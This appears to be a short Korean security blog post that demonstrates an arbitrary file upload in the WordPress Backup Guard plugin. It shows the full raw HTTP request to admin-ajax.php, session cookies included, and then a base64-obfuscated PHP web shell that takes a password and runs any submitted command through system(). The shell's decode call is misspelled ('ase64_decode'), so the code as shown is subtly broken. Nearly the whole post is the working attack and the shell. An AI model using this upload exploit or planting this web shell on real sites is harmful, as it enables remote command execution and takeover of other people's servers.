POST http://192.168.0.91/wp-admin/admin-ajax.php HTTP/1.1 Host: 192.168.0.91 Connection: keep-alive Content-Length: 1946784 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://192.168.0.91 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqE6amufQR0PqHraP Referer: http://192.168.0.91/wp-admin/admin.php?page=backup_guard_backups Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: wordpress_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C19f158651e5c5c1fe87fe3a2ab632c9506ceb98f23e1d6fd747b05e8668fe492; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C1f1c5e2111be175767c1f2f14ac571a1fe9a5453240b9e331093ef6ce229f0d9; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1455757129 ------WebKitFormBoundaryqE6amufQR0PqHraP Content-Disposition: form-data; name="sgbpFile"; filename="test.php" Content-Type: application/octet-stream ------WebKitFormBoundaryqE6amufQR0PqHraP Content-Disposition: form-data; name="action" backup_guard_importBackup ------WebKitFormBoundaryqE6amufQR0PqHraP--Referer : http://www.pritect.net/blog/backup-guard-1-0-3-security-vulnerability
기능 추가 '예정'
<?php
eval(ase64_decode('ICAgICAgICBzZXNzaW9uX3N0YXJ0KCk7CiAgICAgICAgaWYoISRfU0VTU0lPTlsnd2Vic2hlbGxpZCddKQogICAgICAgIHsKICAgICAgICAgICAgICAgIGVjaG8gIklOUFVUIFBBU1NXT1JEIjsKICAgICAgICAgICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIjxpbnB1dCB0eXBlPSdwYXNzd29yZCcgbmFtZT0ncCc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIjwvZm9ybT4iOwogICAgICAgICAgICAgICAgaWYobWQ1KCRfUE9TVFsncCddKSA9PT0gJ1NPTUVfSEFTSFZBTFVFX0hFUkUnKQogICAgICAgICAgICAgICAgICAgICAgICAkX1NFU1NJT05bJ3dlYnNoZWxsaWQnXSA9ICd0cnVlJzsKICAgICAgICB9CiAgICAgICAgZWxzZXsKICAgICAgICAgICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD0nUE9TVCc+IjsKICAgICAgICAgICAgICAgIGVjaG8gIkNNRCA6IDxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdjJyBhdXRvZm9jdXM+IjsKICAgICAgICAgICAgICAgIGVjaG8gIjwvZm9ybT4iOwogICAgICAgICAgICAgICAgZWNobyAiUmVzdWx0IjsKICAgICAgICAgICAgICAgIGVjaG8gIjx0ZXh0YXJlYSBzdHlsZT0nd2lkdGg6MTAwJTtoZWlnaHQ6NTAlJz4iOwogICAgICAgICAgICAgICAgaWYoIWVtcHR5KCRfUE9TVFsnYyddKSkKICAgICAgICAgICAgICAgICAgICAgICAgc3lzdGVtKCRfUE9TVFsnYyddKTsKICAgICAgICAgICAgICAgIGVjaG8gIjwvdGV4dGFyZWE+IjsKICAgICAgICB9'));
?>
'Web' 카테고리의 다른 글
SQLi.py (0) | 2016.11.02 |
---|---|
Upload 코드의 흔한 실수 (2) | 2016.03.07 |
SQL Injection Study (3) | 2015.11.13 |
PHP web development tips and tricks (0) | 2015.11.13 |
Error based SQL (1) | 2015.10.28 |
[stypr] php reverse
2015. 12. 29. 09:08보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.